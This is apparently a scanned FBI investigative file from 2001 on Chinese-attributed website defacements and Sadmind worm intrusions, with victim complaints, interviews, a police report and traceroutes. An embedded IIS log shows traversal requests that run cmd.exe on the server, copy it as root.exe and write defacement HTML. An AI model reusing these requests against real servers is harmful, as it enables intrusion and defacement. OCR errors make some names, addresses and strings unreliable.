Company:  Objectware, Inc. 

Telephone Number: D TEL 

Date of Complaint: 5/07/2001 

Nature of Complaint:  Attempted website defacement incapacitated 
servers. 


Name: 

Company: Peachtree Metals, Inc. 

Telephone Number: 770-476-7000 ext.[  ] 

Date of Complaint: 5/8/2001 

Nature of Complaint: website defaced, webserver content deleted. 
Intruder left a Chinese flag on the hacked page. 


Nam: [__ 1 1] 


Company:  Cignify 

Telephone Number: Lm 

Date of Complaint: 5/13/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 

Company: Cashiers' Resort Rentals 

Telephone Number: 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 

Company: Habitat for Humanity International 

Telephone Number: 229-924-6935 ext. 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Company : sl.ne 


Telephone Number: 770-425-5700 x| č ] 

Date of Complaint: 5/10/2001 

Nature of Complaint: Website defacement with Chinese characters 
on one of Mullins customers! sites, Trailworks.com. The customer 
is physically located in Portland, Oregon. 


Nane: | [cmd 
Company: Tech Electronics, Inc. 


Telephone Number: 

Date of Complaint: 5/11/2001 

Nature of Complaint: Two website defacements on NT/IIS servers. 
Characteristics match Sadmind worm. also reported an 


b3 
b7E 


b6 
b7C 


To: Chicago From: B... 
ne: [ —— — 05/23/2001 


unrelated incident where an intruder set up a file server on 
another machine. 


Name: 

Company: Cox Communications 

Telephone Number: 

Date of Complaint: 5/07/2001 

Nature of Complaint:  Defaced webpage with a pro-Chinese message. 


Company:  Applie oftware 


Telephone Number: 
Date of Complaint: 5/7/2001 
Nature of Complaint: Website defacement on NT/IIS server. 


Characteristics of Sadmind worm. Also infection with the Sadmind 


worm on a Sun Spare computer. 


Name: 

Company: Powell, Goldstein, Frazer, & Murphy LLP 
Telephone Number: 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement on NT/IIS server. 
Characteristics of Sadmind worm. 


Name: 

Company: Dewey Colorsystem 

Telephone Number: 

Date of Complaint: 5/3/2001 

Nature of Complaint: Website defacement on NT/IIS server with 
pro-Chinese message. 


Company: Enterprise Computing Services, Inc. 


Telephone Number: 

Date of Complaint: 5/3/2001 

Nature of Complaint: Website defacement on NT/IIS server. 
Characteristics of Sadmind worm. 


Name: [___ —] | 

Company:  Dekalb County School System 

Telephone Number: ener aa | 

Date of Complaint: 5/9/2001 

Nature of Complaint: Website defacement on NT/IIS server with 
pro-Chinese message. 


Atlanta considers this lead covered. 
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FEDERAL BUREAU OF INVESTIGATION 


FD-302 (Rev. 10-6-95) 


Date of transcription 05/22/2001 


GREAT ARC TECHNOLOGIES, INC. 
(GREAT ARC), 205 West Wacker Drive, Suite 1320, Chicago, Illinois, 


telephone number[ —— ] Web si 
www.dgreatarctech.com, e-mail address was 
interviewed at his place of employment. After was advised 


as to the identity of the interviewing agent and the nature of the 
interview, he provided the following information: 


The Web site for GREAT ARC was defaced on three separate 
occasions during the dates of May 5 and May 6, 2001. The 
defacement was the same on all three occasions. The defacement 
Stated "fuck USA Government fuck PoizonBOx 


contact:sysadmincn@yahoo.comcn". 


In addition to the Web site defacement, the hacker made 
modifications in approximately twenty directories. The hacker also 
deleted some inactive code See asd we cee for a client of 
GREAT ARC. The directories a a) deleted were of 
little value to GREAT ARC or estimated the total 
loss suffered by GREAT ARC to be approximately $2,000. 


analyzed the server activity during the attack and 
determined that the attack was only able to go as far as GREAT ARC. 
GREAT ARC had the necessary sub files to keep the attack from going 
any further. 


[| providea the investigating agent_with a compact 
disk containing the log files for the attack. was unable to 
provide the firewall files for the attack. 


Investigation on 05/21/2001 a Chicago, Illinois 


File # Date dictated N/A 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FD-302 (Rev. 10-6-95) 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/22/2001 


E.P. WACHS, 100 Shepherd 
Street, Wheeling, Illinois, telephone number was 
contacted telephonically. After[__]was advised of the identity 
of the interviewing agent and the nature of the interview, he 
provided the following information: 


On May 14, 2001 the Web site for E.P. WACHS, a 
manufacturing company, was defaced with the message "fuck USA 
Government fuck PoizonBOx contact:sysadmincn@yahoo.com.cn". 
analyzed the system and determined that the defacement was the only 


damage. 

La is not sure if the system was set up to record log 
files. will contact the investigating agent if log files are 
available. 


Investigation on 05/21/2001 a Chicago, Illinois (telephonically) 


Date dictated N/A 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FD-302 (Rev. 10-6-95) 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/22 {2001 
KEMPER INSURANCE GROUP b6 
KEMPER One Kemper Drive, Long Grove, Illinois, telephone number: bic 
l | was interviewed telephonically. after [was 
advised of the identity of the interviewing agent and the nature of 
the interview, he provided the following information: 


On Friday, May 4, 2001, two of KEMPER's Web sites 
suffered defacements. One site was a default Web site for the 
KEMPER network. The other was not an actual Web site but an IP 
address for KEMPER agents access and input their monthly reports. 
The Web sites were down from the time of the attack until Monday, 
May 7, 2001. 


The default site was defaced with the message "fuck USA 


| Government fuck PoizonBOx contact:sysadmincn@yahoo.comen". Through 
his analysis,[ |  ]determined that the attack was using the b6 
SADMIND Worm and was originating from SAINT MARY'S COLLEGE. b7C 


| The IP was defaced with the message "Hacked by DP 
| Sun from KJTU". traced this attack to the Asian Pacific 
| Network. 


The two servers were running Windows IIS, but did not 
have the necessary security patches to prevent the attacks. The 
| servers have been repaired and the necessary security patches are 
now in place. The loss suffered by KEMPER was approximately 
$22,000. 


| On Sunday, May 20, 2001, approximately 100 scanning 
| attempts were made on KEMPER's servers. The scanning attempts were 
| originating from the Asian Pacific Network. 


will provide the investigating agent with copies b6 

of the log files relating to the defacements and scanning attempts. b7C 
Investigation on 05/21/2001 a Chicago, Illinois (telephonically) 

b3 

File # Date dictated N/A b6 

b7C 

by b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
To: Chicago Attn: sal ore b3 
Squad IP/C Be 
b7C 
Minneapolis DIE 
Bismarck RA 
Contact: sa | 701/223-4875 
Approved By: 
Drafted By: 
Title:  Hacker/Honker Union of China; 
Illinois Secretary of State - Victim; 
Synopsis: Lead covered at Bismarck, North Dakota. 
Administrative: RE: Chicago EC to Bismarck RA dated 05/09/2001. 
Enclosure(s): For SA[ ] Chicago Division, one 1A envelope b6 
containing a computer CD for analysis, copy of log files from b7C 
affected computer and one copy of Bismarck Police Department 
report regarding computer intrusion of local businesses. 
Details: On May 7, 2001, SA Bismarck RA was contacted by b6 
who are local computer b7C 


contractors for various businesses. advised sometime 
during the early morning hours of May 7, 2001, someone hacked 
into a local computer network and defaced several web-pages of 
local businesses. 


Sa[ ]met (Fa: Schumacher 


Diamo S. Second, Bismarck, North Dakota, telephone 
numbe to discuss what happened to their network and 
web-page eeting with the computer contractors, SA 
requeste to copy the computers log files and if 


possible provide a CD of the log files and other information to 
assist with the investigation. [ J] provided the CD to SA 


[ J] May 8, 2001. 


b7E 


3 ~ 4 $ - b3 
| e e zi 
To: Chicago From: Minneapolis 


Re: (| 08/23/2001 


b6 
Ideapool Inc., 2010 46th b7C 


Avenue, Southeast, Mandan, North Dakota, telephone number 
and Payroll and 


Bookkeeping Services, o e same address, telephone number 
EAM they would provide detailed information if 
the Case Agent in Chicago needed a follow-up interview. 


Bismarck considers this matter closed. 


a a 2 
To: Chicago From: bo e 
Re: LH 08/23/2001 b3 


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, ILLINOIS 


Read and clear. 
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untitled 


134.129.130.35, -, 5/7/01, 12:14:08, W3SVCl, CSM SERVER, 192.168.2.150, 1382, 432, 146, 304, O, GET, 
/images/Buttons/button.gif, -, 

134.129.130.35, -, 5/7/01, 12:14:08, w3SVC1, CSM SERVER, 192.168.2.150, 10, 387, 11466, 200, 0, GET, /DEFAULT.ASP, -, 
134.129.130.35, -, 5/7/01, 12:14:10, W3SVCl, CSM SERVER, 192.168.2.150, 2042, 431, 147, 304, O, GET, 
/images/Buttons/hover.gif, -, 

134.129.130.35, -, 5/7/01, 12:14:12, W3SVC1l, CSM SERVER, 192.168.2.150, 2534, 432, 146, 304, O, GET, 


/images/Buttons/button.gif, -, 
193.140.77.2, -, 5/7/01, 12:20:26, W3SVCl, CSM.SERVER, 192.168.2.150, 110, 66, 813, 200, 0, GET, 
/scripts/../../winnt/system32/cmd.exe, /c+dir, 


193.140.77.2, -, 5/7/01, 12:20:26, w3SVC1, CSM SERVER, 192.168.2.150, 30, 70, 753, 200, O, GET, 
/scripts/../../winnt/system32/cmd.exe, /c«dir-..N, 

193.140.77.2, -, 5/7/01, 12:20:29, w3SVC1, CSM SERVER, 192.168.2.150, 110, 100, 382, 502, O, GET, 
/scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+troot.exe, ‘ 
193.140.77.2, -, 5/7/01, 12:20:34, w3SVC1, CSM SERVER, 192.168.2.150, 80, 423, 355, 502, 0, GET, /scripts/root.exe, 


c+echo+A<him] A>A<body+bgcolor%3Db lackA>A<brA>A<brA>A<brA>AcbrA>A<brAsA<brA>A<tabl e+wi dth%3D100%A>A<tdA>A<p-+al i gn%3D%22¢ 
‘ ter%22A>A<font+size%3D7+co lor%3DredA>fuck+USA+GovernmentA</fontA>A<trA>A<tdA>A<p+al1gn%3D%22center%22A>A<font+size%3D7 
+color%3DredA>fuck+Po7 ZonBOxA<trA>A<tdA>A<p+al i gn%3D%22center%22A>A<font+si ze%3D4+co0 1 or%3DredA>contact: sysadmcn@yahoo.co 
m.cnA</htmlA>>.././index.asp, l 
193.140.77.2, -, 5/7/01, 12:20:34, w3SVC1, CSM SERVER, 192.168.2.150, 30, 423, 355, 502, 0, GET, /scripts/root.exe, 
/c+echo+A<htmlA>A<body+bgcolor%3Db lackA>A<brA>A<brA>A<brA>A<brA>A<brA>A<brA>A<tab 1 e+wi dth%3D100%A>A<tdA>A<p+al i gn?63D7622c 
enter%22A>A<font+size%3D7+co0 lor%3DredA>fuck+USA+Governmenta</fontA>A<trAsA<tdA>A<p+a li gn%3D%22center%22A>A<font+size%3D7 
+color%3DredA>fuck+Poi zonBOxA<trA>A<tdA>A<p+align%3D%22center%22A>A<Ffont+si ze%3D4+color%3DredA>contact: sysadmcn@yahoo.co 
m.cnA</htmlA>>.././index. htm, 


24.220.29.170, -, 5/7/01, 12:45:54, w3Svc1, CSM SERVER, 192.168.2.150, 90, 305, 11574, 200, 0, GET, /DEFAULT.ASP, -, 
24.220.29.170, -, 5/7/01, 12:45:54, W3SVCl, CSM SERVER, 192.168.2.150, 1042, 312, 14505, 200, 0, GET, /animate.js, ~, 
24.220.29.170, -, 5/7/01, 12:45:56, W3SVCL, CSM SERVER, 192.168.2.150, 991, 320, 22372, 200, 0, GET, /images/cdalin 
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ADDRESS APT# CITY, STATE, ZIP PHONE ME 


ARR.CODE | 
ARMED WITH [ARMED WITH 


TYPE OF ACTION MULTIPLE CLEARANCES 
(CITAKENIN — (m | [C] NOT APPLICABLE 
(Jon view (0) | L] COUNT Tuis ARREST 
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R Se t CNRC, 
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SUBJECT NO. THIS SUBJECT IS: (S) [1 SUSPECT 
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ADDRESS APT# CITY, STATE, ZIP PHONE 


EM AM. NE aa o ud pani 
/ of 


S 
U 
B 


OCCUPATION 


| po uomesce 
f 9 
f ü 


ARREST/SUMMONS TRACKING NUMBER. 


ADDRESS 
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E | TYPE OF ACTION MULTIPLE CLEARANCES RESIDENCE MULTIPLE CASE CLOSURES ARMED WITH {ARMED WITH 
$ [TAKEN IN (m | C] NOT APPLICABLE (Nj [C RESIDENT | case ¢ CASE # 
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The information I have provided in this case is true and correct to the best of my knowledge. 1 will inform this agency if property reported as stolen is recovered. | will assume responsibility for any costs associated 
with return of reported stolen property, missing persons or runaway juveniles. 1 (will) (will not) (not appl) assist In prosecution of offenders associated with this case. 


O UNFOUNDED [.] FILED INACTIVE 
[7] PENDING E] WARRANT 
[.] CLRo BY ARREST [3 JUVENILE 
C] NO PROSECUTION 


(N) [C] NOT APPLICABLE (C) [L] EXTRADITION DENIED 


(A) ['] SUSPECT/OFFENDER DEAD (D) [7] VICTIM REFUSED TO COOPERATE DATE EXCEPTIONALLY CLEARED 
(B) [L] PROSECUTION DECLINED (©) [.] JUVENILE/NO CUSTODY / / 


Bismarck Police Department 
BISMARCK, NORTH DAKOTA 58504 


o (C Q pyre eee R@PORT oso. 


Computer Fraud Schumacher’s Diamond Cutters 


TYPE OF OFFENSE VICTIM 


SUBJECT(S) 


on 05- 07- 0i at 0934 IR I was dispatched to Schumacher's Diamond Cutters, 714 S 2n 


raud report. On scene I met with subject/witnesses #1 and #2, . 
ex-emplo er's Diamond Cutters. They stated that they still do contract b7C 
work for at this time. They stated that they all own their own businesses 
located in Mandan. They stated that this morning when they went into to view the 
websites that are on a server [e of business, the website appeared 
to have been hacked. 


At this time we went and looked at the first computer site, Schumacherdiamond.com. When 
this website was entered the standard web page did not appear, but a black page with red 
writing on it appeared. The red writing stated "fuck USA Government", "fuck PoizonBOx", 
"contact:sysadmen(yahoo.com. en". 


When I went to the address “sysadmen@yahoo.com.en, I received a yahoo page out of China 
Yahoo. It was two pages long and the entire pages were written in Chinese. This is 
attached to the original report as B-1 and B-2. 


i asked[ ^ U i ]^ew many different websites are on the server. They b6 
provided a list of websites that are on the server that were hit by these hackers. There b7C 
are five different websites that are listed with the report. When you go to them, you 

receive this same black screen with the red letters. There was only one website within 

the server that was not tampered with. š 


The computer belongs: to Schumacher’ s Diamond Cutters. The of b6 
Schumacher's Diamond Cutters is did come to the b7C 


business once I started taking the report. He was aware of the problem. 


A timeline was established by[ LL... ..] He stated that the last time he was on the 
computer was Sunday night, 05-06-01, at approximately 1600 hours, and the website was 
fine. He stated that this morning, 05-07-01, at 0800 hours, the website had been hacked. 
He believes that whoever was in the computer was possibly in it at the time that he 
logged in. It is unsure to me why he believes this. 


The FBI was contacted and I spoke with FBI Agent[ sd After explaining to Helm 
that we believed that the computer had been hacked by subjects in China, he stated that 
he would be over to view the computer. He also contacted FBI specialists in Minneapolis, 
and he believed that they would be doing follow-up on the case. 


b6 


b7C 
05-07-01 


investigating Officer 


STATUS: COPIES TO: 

C] UNFOUNDED (J FILED INACTIVE Li Crime Prev. — ( ] City Attorney L] information Only 
C PENDING L) WARRANT CJ Detective L.] States Attorney „A Ofer. 

[0 CLAD BY ARREST O JUVENILE O PYB D Inv. Officer 


C] NO PROSECUTION Reviewer BPD Form 301 


Rev 8/2000 


Page 1 of 1 
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contact: SX "sadmen. "m V "ahoo. com: en 


http://www.schumacherdiamond.com/ 05/07/2001 
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FEDERAL BUREAU OF INVESTIGATION 


« 


Precedence: ROUTINE Date: 05/24/2001 


TO: VW fhicago Attn: SA 
Counterterrorism SS 


From: Dallas 
Security 


Contact: | ] x2386 
Approved By: 
Drafted By: 
Case ID PEERS (Pending) 
(Pending) 


Title:  HACKER/HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report complaint received at Dallas Division 


regarding a web page defacement by unknown individual coming from 


a Chinese Internet Protocol (IP) address. 


Enclosure(s): FD-71 (complaint form) completed by | 
Diskette containing IIS logs, defacement and WatchGuar 


ert, provided by GAPRS via e-mail, regarding the computer 


pre of the GAPRS web server; 


Details: On 05/23/2001, writer was telephonically contacted by 
with Greet America Public Record Services (GAPRS) 
ocated a 5 E. R L Thorton Freeway, Dallas, Texas, telephone 
number[ ]advised writer that on 5/21/2001 
GAPRS' web server was compromised by unknown individuals coming 
from the IP address 202.118.7.199. 


A trace route conducted by to the IP address 
revealed that it resolved back to Beijing. After gaining access 
to the web server, which was running Windows NT IIS 4.0, the 
intruders defaced the company's internal web site, 
research.gaprs.com. The customer site www.grprs.com was not 
defaced. The defacement contained the statement "fuck USA 
Government fuck PoizonBOx, contact:sysadmcneyahoo.com.cn." 


estimated that the damage to GAPRS was between $500-$1000. 


stated he would e-mail the IIS logs.and the defacement. 
Since other GAPRS' computers were not within the DMZ, they were 
not compromised. 


b6 
b7C 
b7E 


b6 
b7C 


3 


To: Chicago S Dallas B ; 
Re: DP] 05/24/2001 


Dallas Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


b3 
b7E 


b6 
b7C 
b7E 


& P 


To: i : Dallas 
Re: 05/24/2001 


LEAD(s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, IL 


Take action deemed appropriate. 
Set Lead 2: 
COUNTERTERRORISM 
AT WASHINGTON, DC 


Read and clear. 


+e 


b3 
b7E 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative g See below 


| Subject's name and aliases Character of case 


suns); = 
i " 
Complainant Protect Source 
ee Greet America Public 


Record Services (GAPRS) 


Complaint received 


[ ] Personal Telephonie Date 05/23 2001 Time | am 


Address of Subject Complainant's address and telephone number 


8035 E. R L Thorton Frwy 
Dallas, Tx 75228 (214/320-9836 


Complainant's DOB 


Sex 


Male 


8 
u 

2S 

3 

A & | Scars, marks and other data Originating IP 202.118.7.199 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


Complainant advised that on 5/21/2001 GAPRS' web server was 
compromised by unknown individuals coming from the IP address 
202.118.7.199. A trace route conducted by[ . ]to the IP address 
revealed that it resolved back to Beijing. After gaining access to the 
web server, which was running Windows NT IIS 4.0, the intruders defaced 
the company's internal web site, research.gaprs.com. The customer site 
www.grprs.com was not defaced. The defacement contained the statement 
LU SA Government fuck PoizonBOx, contact:sysadmcn@yahoo.com.cn.” 

estimated that the damage to GAPRS was between $500-$1000. 
stated he would e-mail the IIS logs and the defacement. Since other 
GAPRS' computers were not within the DMZ, they were not compromised. 


Do not write in this space. 


BLOCK STAMP 


b3 
b6 
bp7C 
b7E 


http://www.network-tools.com/default asp?prog-Express&servlook-209.237. 160.161 &hops=2' 5/24/01 


Tucows OpenSRS Registrar - .TV names - Discount SSL Site Certificates 


C DNS RECORDS 
C HTTP HEADERS 
C NETWORK 


C LOOKUP 
C PING 
C TRACE 


@ EXPRESS TRACE 


Se SR mea m] 
H 


f uu ee m 
poziiszis — p Submit. 


jl. 


Contact WHOIS servers using standard WHOIS commands: 
EE IV Shared Registry. 
[ Root Server 


rs.internic.net hé Choose 


Reverse Lookup Result: www.nams.com.cn. 


TraceRoute to 202.118.7.199 [www.nams.com.cn] 


Hop (ms) (ms) (ms) IP Address Host name 

0 0 0 209.237.131.3 

O 15 0 157.130.73.121  serial4-1-1.9w1.orl1.alter.net 

31 16 16 152.63.84.46 504.at-2-1-0.xr2.atl1.alter.net 

31 16 15 152.63.10.77 0.so-3-0-0.tr2.atl1.alter.net 

31 32 47 146.188.141.62  109.at-5-0-0.tr2.dca6.alter.net 

31 31 47 152.63.11.90 0.so-3-0-0.XR2.DCA6.ALTER.NET 
47 32 152.63.38.89 0.so-2-1-0.XL2.DCA6.ALTER.NET 
* 31 32 152.63.38.137 POS7-0.BR2.DCA6.ALTER.NET 
31 31 47 137.39.52.166 

31 31 47 207.45.223.121  if-4-0.core1.Washington.Teleglobe.net 


aN). ox 
=- O DOAN DON KRWHD ~ 
[49] 
— 


47 31 47  64.86.83.161 if-4-0.core3.NewYork. Teleglobe.net 
12 94 94 93 64.86.83.174 if-8-0.core2.LosAngeles. Teleglobe.net 
13 94 78 78 64.86.83.146 if-6-0.core2.LosAngeles2.Teleglobe.net 
14 78 78 94 64.86.80.38 if-0-0-0.bb1.LosAngeles2.Teleglobe.net 


Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS, DNS Records Lookup, an Page 1 of 3 


237.160.161&hops-..! 5/24/01 


http://www.network-tools.com/default,asp?prog=Express&servlook=209 


15 78 93 79 64,.86.173.34 

16 235 250 235 202.112.61.21 

17 . 235° 250 234 202.112.36.132 

18 234 235 250 202.112.36.242 

19 234 250 235 202.112.1.62 

20 250 234 266 202.112.1.193 beijing-bgw1-lan.cernet.net 
21 250 234 250 202.112.1.134 xian-bgw2-lan.cernet.net 
22 766 781 766 202.112.1.122 

23 765 782 765 202.112.1.185 beijing-bgw4-sat.cernet.net 
24 766 781 766 202.112.1.94 shenyang-rgw-lan.cernet.net 
25 781 781 782 202.112.29.73 Sy-rgw.synet.edu.cn 

26 781 782 781 202.112.29.199 

27 797 781 782 202.112.31.225 

28 781 797 765 202.118.4.225 router-4500.neusoft.com.cn 
20 797 3765 782 202.118.7.199 WWW.nams.com.cn. 


Trace complete 
Reverse Lookup Result: www.nams.com.cn 


Lookup Result: 0.0.0.0 
China Whois web interface contacted: http:/Awww.cnnic.cn/cgi-bin/domainac 


[x] logol, c.GIF (4982 bytes) 


[xi icol.JPG (9611 bytes) 


OUCNNICpAONx ¢ 2 400A0 2 30DA»ÓBOÓpH08 , 616À; j£ 
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ee 
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© Copyright CHINA INTERNET NETWORK INFORMATION CENTER 
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DNS records for: com.cn 


Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS, DNS Records Lookup, a..; Page 2 of 3 


http :/www network-tools.com/default.asp?prog=Express&servlook=209.23 7.160.161 &hops=..! 5/24/01 


Answer records 


com.cn” ^ 4 NS  sld-nsi.cnnic.net.cn 86400s 
com.cn 1 NS  sns.cernet.net 86400s 
com.cn 1 NS  sld-ns2.cnnic.net.cn 86400s 

server: ns.cnc.ac.cn 

email: hostmaster@ns.cnc.ac.cn 

serial: 2001052406 

refresh: 21600 

retry: 7200 

. expire: 3600000 
com.cn 1 SOA minimum ttl: 86400 86400s 


Authority records 


Additional records 
sld-ns1.cnnic.net.cn 1 A 159.226.1.3 86214s 
sld-ns2.cnnic.net.cn 1 A 202.97.16.197 86214s 


DNS records for: nams.com.cn 


DNS query for nans. com. oen failed: Queried domain does not exist 


Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS, DNS Records Lookup, a.: Page 3 of 3 


a 
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FD-801 (Rev. 7-15-97) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 


b3 


To: Counterterrorism Attn:  NIPC/CIOS/CIU 
b6 
Room 5965 ETG 


From: SAC, Newark 
Approved By 
Drafted By: 


Case ID #: 


Title: UNSUB(s); 
NOVO NETWORKS - Victim; 


SUBMISSION: OC Initial O Supplemental XX - Closed 
CASE OPENED: 


CASE CLOSED: 5/15/01 

O No action due to state/local prosecution (Name/Number ) 
X USA declination 

O Referred to Another Federal Agency (Name/Number: ) 
O Placed in unaddressed work 

O Closed administratively 

O Conviction 


COORDINATION: FBI Field Office NEWARK 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: NOVO Networks 
Address/location: 1 Evertrust Plaza, Jersey City, NJ, telephone (201) 200-5515 x[ —— ] b6 
Purpose of System: Internet connectivity and long distance telephone pre paid calling cards BIC 
Highest classification of information stored in system: 
System Data: 

Hardware/configuration (CPU): Sun Solaris 

Operating System: SunOS 

Software: 
Security Features: 

Security Software Installed: [O yes (identify ) O no 

Logon Warning Banner: Ll yes O no 


b3 
b7E 


: SAC, Newark @ 


To: Counterterrorism. From: 
Re: 5/15/01, 


INTRUSION INFORMATION 


Access for intrusion: O Internet connection [1 dial-up number O LAN (insider) 


Method: 


Internet address: 
Network name: 


Technique(s) used in intrusion: 
Path of intrusion: 


Subject: UNSUB(s) 


addresses: 1. 2. 3. 4, 5. 
country: 1. 2. 3. 4. 5. 

facility: 1. 2. 3. 4. 5. 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 
Group Affiliation: 

Employer: 

Known Accomplices: 

Equipment used: 


Hardware/configuration (CPU): 
Operating System: 


Software: 
Impact: 
Compromise of classified information: O yes x-no 
Estimated number of computers affected: one (1) 
Estimated dollar loss to date: Unknown 
Category of Crime: 
Impairment: Theft of Information: 
LJ Malicious code inserted O Classified information compromised 
C Denial of service O Unclassified information compromised 
O Destruction of information/software [] Passwords obtained 
LJ Modification of information/software O Computer processing time obtained 
X Telephone services obtained 
[1 Application software obtained 
LC] Operating software obtained 
Intrusion: 


O Unauthorized access 
O Exceeding authorized access 


b3 
b7E 


To: Counterterrorism From: SAC, Newark © 
Re: 5/15/01 O — i ] bs 
b7E 


REMARKS 


| | b6 
a NovoNetworks, 1 Evertrust Plaza, 8th Floor, b7C 


Jersey City, New Jersey, (201) 200-5515, c EREMI said that his 
company provides Internet bandwidth and prepaid calling card 
services. 


On or about 5/5/01, their Sun system was compromised by 
the Sad Mind Worm. removed the components of the worm, b6 
feels that information has been stolen from the system. b7C 
p believes that an unknown number of prepaid calling card 
PINs were taken because there has been an increased number of 
invalid authorizations being reported. explained that 
there are in excess of 70 1-800 telephone numbers that are 
associated with specific prepaid cards and if a prepaid card 
number is entered and the wrong,l1- umber was dialed, an 
exception report is generated. is not sure which #'s were 
compromised, and the system does not track calls completed. 
Therefore, he is not able to determine the extent of the damage. 


Eu has various logs and IP address since May 5th, but b6 
does not have any surrounding the actual inci nd does not bie 
have any information about the compromise. eee have IP 

addresses for individuals who are ftp'ing to his site and ftp'ing 
elsewhere. has not patched his system, but is currently 

having a mirror drive prepared from backup to replace the 

compromised d p also having his telephone switch 

vendor, Siemens, track the originating telephone numbers for the 

error log. mum. also seeing an increase in usage in older 

products, leading him to believe that a compromise occured, but 

he does not have any specific details. 


According to Siemens the telephone calls are originating 
from Italy, Taiwan, Californi nd Lousianna State Govt's. The 
IP addresses identified byl possibly spoofed) are; b6 
b7C 
206.142.142.4 - LeapFrog Technology, Abilene, TX 
217.83.228.217 - Deutsche Telekom, Germany 
62.163.234.170 - Chello, The Netherlands 
64.229.80.183 - Unassigned RIPE.net address 
213.22.76.23 - TVCABO, Portugal Cable Modem 


Ll nad, contacted Jersey City Police who put him in b6 
contact with NJUSP High Tech Crimes Unit, and has not received a b7C 


response. [was told by the FBI that they should consider 
patching the server exploit, cancelling all possible PINs to 
alleviate the amount of losses and continue monitoring the 
situation, because the USAO has declined prosecution. 


To: Countert i | - SAC, Newark e 
Re: 5/15/01, 


Menu 
Technology(s) Used: 


Top Screen Secondary Screen 
Protocol Attacks: 
X IP X spoofing attack 
O source routing 
O TCP 
O sequence number attack 
L] UDP [] spoofing attack 
O flooding 
X FTP X vulnerable version 
T SITE EXEC 
O overload FTP buffer 
L] anonymous FTP 
O0 TFTP 
[] Telnet [1 highjacking 
O packet sniffing 
O r commands O rsh 
O rlogin 
O SMTP L] vulnerable version 
O spoofing 
O embedded postscript attack 
CL] trojan horse attack 
O syslog attack 
O flooding 
Ol MIME 
L] HTTP [1 flooding 
L] Telnet to HTTP port 
Ll gopher 


b3 
b7E 


To: Counterterrorism From: 


Re: 5/15/01, 


Top Screen 


Protocol Attacks: 


L] X11 window 


L] DNS 


O SNMP 
O FSP 


O NES 


Other Attacks: 
O Worm 
O Social engineering 
O Scavenging and reusing 
O Masquerading 
O Scanning 
O Trojan Horse 


O Other 


oe 


SAC, Newark e 


Secondary Screen 


O vulnerable version 
L1 flooding 


b3 
b7E 


FD-71 (Rev. 3-27-95) 
$ Complaint Form 9 e 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [X] Negative [L See below 


Subject's name and aliases Character of case 


UNSUB Computer Hacking 


Complainant | zn Source 


NOVO Networks 


Complaint received 


L] Personal [X] Telephonic Date 05/15/2001 Time am 


Address of Subject Complainant's address and telephone number 


1 Evertrust Plaza, Jersey City, NJ 
(201) 200-5515 X[ | 


I MB 


Scars, marks and other data 


Employer Address Telephone 


Subject's 
Description 


Vehicle Description 


Facts of Complaint 


Approximately two days ago, company computers attacked by a "worm." 
Subsequently, company's IP address was used to attack outside sites. 
Confidential list of PIN's has been published on the Internet. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


b6 
b7C 


b6 
b7C 


^ we m 
* S 
€ | 


U.S. Department of Justice 


Federal Bureau of Investigation 
b3 


File No. Legal Liaison Office Pas 


26 Garden Road 
Hong Kong, SAR 
Tel: (852) 2841-2348 
Fax: (852) 2522-6843 


May 30, 2001 


Interpol NCB 

Ministry of Public Security 
14 Dong Chang An Street 
Beijing, China 

Via Fax 86-10-6512-5804 


Re | HACKER/HONKER UNION OF CHINA 
Your Ref: New Request for Assistance 


Dear Sir/Madame, 
On May 22, 2001, my Chicago Office advised: 


"Chicago Division of the FBI is the lead office for the criminal investigation of the 
Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions 
against United States Web sites originating out of China. Also, as a part of this investigation, 
United States based groups carrying out actions against Web sites originating out of China are 
being investigated. 


. "The attacks have taken the form of denial of service attacks, installation of the Adore 
worm and Web page defacements. Attacks have been reported in Chicago, Washington, D.C., 
San Francisco, and Portland, Oregon." (End of text of letter from Chicago) 


May I request that you provide any information regarding any of the activities detailed 
above. 


ES x eel 

“AAL 

"ATE. £e; Of. 
Your assistance is sincerely appreciated. 


A 


b6 
b7C 


Legal Liaison Officer 


This report is the property of the Federal Bureau of Investigation. It is being provided to you for background information 
only. It is not to be disseminated outside your agency without the explicit consent of the FBI. f iC (£T 
"cef 


* 


(Rev. 08-28-2000) e e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/29/2001 
To: Counterterrorism Attn:  CIU, CIOJ, NIPC, RM. 5965 
/ ATTN: SSA 
Endo Attn: SA 
Squad IP/C 


From: Cincinnati 
Squad 4 


Contact: SA[ — 0 [513.562.5741 C] 


